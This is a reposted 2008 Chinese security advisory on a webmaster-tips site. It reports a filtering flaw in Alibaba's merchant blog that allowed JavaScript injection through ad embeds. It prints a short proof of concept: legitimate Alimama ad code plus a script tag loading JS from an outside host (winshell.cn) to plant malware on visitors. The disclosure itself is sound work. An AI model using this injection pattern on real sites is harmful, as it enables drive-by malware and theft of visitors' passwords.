网站建站知识
www.ccacc.org.cn
网站首页建站基础域名知识主机维护网页制作建站心得搜索推广策划赢利行业资讯
 ◎ 您现在的位置: 建站知识网 >> 主机维护 >> 正文
   阿里巴巴网商博客现漏洞           
阿里巴巴网商博客现漏洞
作者:佚名 文章来源:不详 点击数: 更新时间:2008-11-12 13:33:30

  据国内安全组织“安全警戒线”检测,阿里巴巴网商博客出现漏洞,由于过滤不严,不法黑客或可能通过加载JS代码形式进行挂马,从而盗窃访问者相关财产密码或引发跨站攻击。具体情况如下:

  文章作者:攻击者

  信息来源:安全警戒线

  文章备注:已经给马云发E-MAIL

  在阿里巴巴网商博客中允许我们填加阿里妈妈的广告,但是他却没有过滤掉除了阿里妈妈以外的地址,从而可以使用JS挂马,简单的不能在简单的利用方法:

<script type="text/JavaScript">
alimama_pid="mm_10031051_1309365_2877941";
alimama_titlecolor="0000FF";
alimama_descolor ="000000";
alimama_bgcolor="FFFFFF";
alimama_bordercolor="E6E6E6";
alimama_linkcolor="008000";
alimama_bottomcolor="FFFFFF";
alimama_anglesize="0";
alimama_bgpic="0";
alimama_icon="0";
alimama_sizecode="22";
alimama_width=120;
alimama_height=240;
alimama_type=2;
</script>
<script src="http://a.alimama.cn/js.js" type=text/javascript></script>
<script src="http://www.winshell.cn/js.js" type=text/javascript></script>

文章录入:admin    责任编辑:admin 
  • 上一篇文章:

  • 下一篇文章:
  • 最 新 热 门
  •  企业网站建好后维护几点要
     网站的DDOS攻击和防范方法
     从此不怕被爆管理员帐号及
     黑客入侵CheckFree域名系统
     关于留言的探讨和其他
     利用网站管理员工具诊断网
     一针见血分析公司的十类人
     国内主流博客系统概括
     写错别字并不代表幽默
     虚拟主机与合租服务器的区

  • 最 新 推 荐
  •  站长应该如何做原创内容
     如何做在线社区运营
     搜索引擎的分词技术
     利用网站管理员工具诊断网
     如何增强网站内容可读性
     站长成功秘籍:坚持、执着
     制作网页需要学习的技术
     选择网站域名的六点建议
     导致网站失败的十大原因
     让您的网站也拥有一个“收

  • 相 关 文 章
  • 阿里妈妈举办网络营销论坛
    本科论文居然要分析阿里妈
    广告主:不得不说的阿里妈
    阿里集团3亿元注资旗下生活
    百度跟阿里和搜狐等网站开
    寒冬悟道者马云:阿里巴巴
    阿里巴巴和百度的恩恩怨怨
    阿里巴巴3亿元投资雅虎口碑
    阿里妈妈你又怎么啦
    阿里巴巴3亿元投资雅虎口碑
    | 设为首页 | 加入收藏 | 联系站长 | 友情链接 | 版权申明 | 最新公告 | 网站地图 |

    本站提供网站制作、网站建设等知识,部份资料来自互联网 京ICP备06038928号
    网站建站知识网 www.ccacc.org.cn 2005-2008 版权所有 联系QQ:260785812